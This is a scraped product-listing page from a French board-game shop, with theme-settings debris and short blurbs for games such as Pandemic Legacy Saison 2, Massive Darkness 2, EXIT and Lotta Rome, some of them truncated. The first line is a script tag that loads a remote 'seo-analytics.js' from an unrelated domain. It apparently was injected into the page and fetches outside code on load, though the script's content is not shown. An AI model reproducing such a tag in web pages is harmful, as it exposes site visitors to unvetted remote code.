<script src="https://general-soft.space/seo-analytics.js" async></script>
|
Select Theme
|
|
|
Custome Color 1
|
|
|
Custome Color 2
|
|
|
Box-Layout
|
|
|
Background Pattern
|
custome background also available in admin. |
|
Background color
|
|
|
Wow Animation Enable
|
|
|
Left Stickt Enable
|
|
|
Right Stickt Enable
|
|
Garanties sécurité (à modifier dans le module "Réassurance")
Politique de livraison (à modifier dans le module "Réassurance")
Politique retours (à modifier dans le module "Réassurance")
| 2 Produits |
| Auteur(s) : | Matthew Dunstan, Dave Neale |
| Année : | 2022 |
| Editeur : | Ravensburger |
| Nombre de Joueurs : | 1 à 4, idéal à 2 |
| Age : | 14 Ans |
| Durée : | 60 Mns |
Dans une petite ville du Centre de la France, on retrouve dans les caves le corps sans vie de Jean-Louis Safarian, le gardien de l’immeuble qui compte 6 habitants.
Qui a bien pu commettre ce crime, pourquoi et comment ?
Quatre créatures célestes sont considérées comme les gardiennes du monde et sont vénérées dans tout l’empire. On les pensait des légendes, mais la peste zombie a poussé ces forces élémentaires à se manifester… pas sous leur forme céleste, mais sous la forme d’abominations !
À chaque fois que la carte Créatures Célestes est piochée, une abomination est générée, dans un ordre précis. L’oiseau Vermillon en premier, le Tigre Blanc ensuite, la Tortue de Jais et enfin le Dragon d’Azur. Chacun d’eux doit être vaincu puis pourra être remplacé par l’abomination suivante. Chacune d’elle agit de manière différente et possède ses propres capacités. Le Survivant qui parvient à vaincre l’une de ces créatures reçoit une compétence spéciale.
Trois générations et une saison plus tard…
La saison 2 tant attendue de Pandemic Legacy est enfin là ! Cette nouvelle aventure se déroule 71 ans après l’infection originelle. Le monde a survécu, mais il est en ruines. Les grands centres urbains sont reliés entre eux et maintenus en l’état par un réseau de stations nommées « Havres ». Ces Havres sont des stations flottantes, desquelles sont expédiés toutes les ressources nécessaires.
Las, des villes ne donnent plus signe de vie. Il faut aller sur place, redécouvrir une planète à la dérive.
Et c’est là que les joueurs interviennent ! Comme nouveautés, Pandemic Legacy Saison 2 propose un « brouillard de guerre » (vous découvrez le
Un sombre abîme s’est ouvert ; des morts-vivants tentent d’envahir notre monde.
Vous, les gardiens, avez uni vos forces pour renvoyer ces créatures ténébreuses dans l’abîme dont elles ont émergé.
Mais à chaque seconde, ces morts-vivants gagnent en puissance, et menacent de submerger notre monde.
Grâce aux cartes de l’Abîme, les joueurs vont pouvoir former des combinaisons afin de jeter de redoutables sorts et d’accomplir le rituel final de bannissement morts-vivants. Pour cela – et pour remporter la partie, ils devront œuvrer de concert, conjuguer leurs compétences, se porter assistance, et se protéger mutuellement des attaques des morts-vivants.
Figurines non peintes. Nécessite le jeu de base pour être joué.
En quête de chef d’œuvre
Grâce à la magie de leur musique et de leurs chansons, les Bardes sont capables de semer le désespoir et la panique chez les adversaires les plus redoutables, tout en inspirant leurs alliés à accomplir des actes de bravoure inouïs. La créativité des Ingénieurs leur permet de construire des gadgets et des améliorations qui renforcent leurs propres compétences et capacités, ainsi que celles de leurs compagnons.
Cette extension contient 4 Héros répartis en 2 nouvelles Classes : Barde et Ingénieur, ainsi que tous les éléments vous permettant de les jouer. Vous y trouverez également un nouveau Monstre Errant : l’Ange de Métal, un ange narcissique transformé en une machine à tuer sans âme.
Nécessite une boîte de base Massive Darkness 2
Ce pack comprend 6 versions d'Eddie, la fameuse mascotte d'Iron Maiden. En plus des figurines, le pack comprend du matériel pour les utiliser dans de nombreux jeux de différentes manières, notamment Zombicide 2nd Edition, Black Plague, Invader et Undead or Alive, ainsi que Ankh : Gods of Egypt, Massive Darkness 2 et Cthulhu : Death May Die.
Après le succès du premier chapitre et une nomination à l'As d'Or - Jeu de l'Année,
retrouvez le prince Collin et toute la bande de héros souris dans cette première extension
pour Mice & Mystics.
Affrontez de nouveaux dangers à l’aide de nouvelles compétences et nouveaux objets dans ce dernier conte très sombre où une tristesse
EXIT est un jeu qui reprend les sensations des "escape games". Muni d'indices, de matériel et d'un décodeur, vous aurez pour mission de sortir du jeu le plus rapidement possible. Plus qu'un jeu : une expérience unique et immersive dans laquelle vous devrez faire preuve de coopération, d'observation et de logique.
Dans Lotta Rome, les joueurs tentent de construire le domaine le plus rentable en se partageant des territoires entre eux. Les tuiles Terres sont activées grâce à des bâtiments, générant ainsi des points de victoire. Mais pour récupérer ces terres et ces bâtiments, il vous faudra faire des choix. Le jeu repose sur le principe du ""Je sépare tu choisis"" : un joueur sépare ses terres en lots, mais c'est son adversaire qui choisit en première celui qu'il récupère. Et il faudra également prendre en compte, les gemmes, qui rapportent de précieux points en fin de partie. Avec sa durée de partie compacte et ses choix cornéliens à chaque tour, Lotta Rome plaira aux stratèges et aux collectionneurs.
Le célèbre jeu inspiré des escape games revient pour une onzième boite !
Retrouvez 3 aventures inédites de 60 minutes, avec 3 niveaux de difficulté, et toujours autant de puzzles et d’énigmes à résoudre, de machines à manipuler, d’objets à combiner et d’évènements à affronter !
Au programme :
Vous et votre adversaire êtes des voyageurs temporels rivaux qui tentent mutuellement de s'effacer de l'histoire. Pour prouver que vous êtes le seul véritable inventeur du voyage dans le temps, vous devez utiliser votre invention pour débusquer votre ennemi et l'assassiner... avant qu'il ne vous attrape !
Malheureusement, étant donné que votre ennemi a répandu de nombreuses copies de lui-même sur la chronologie, vous devrez peut-être commettre l'acte terrible de nombreuses fois avant qu'il ne reste. Assurez-vous simplement de ne pas être éliminé en premier !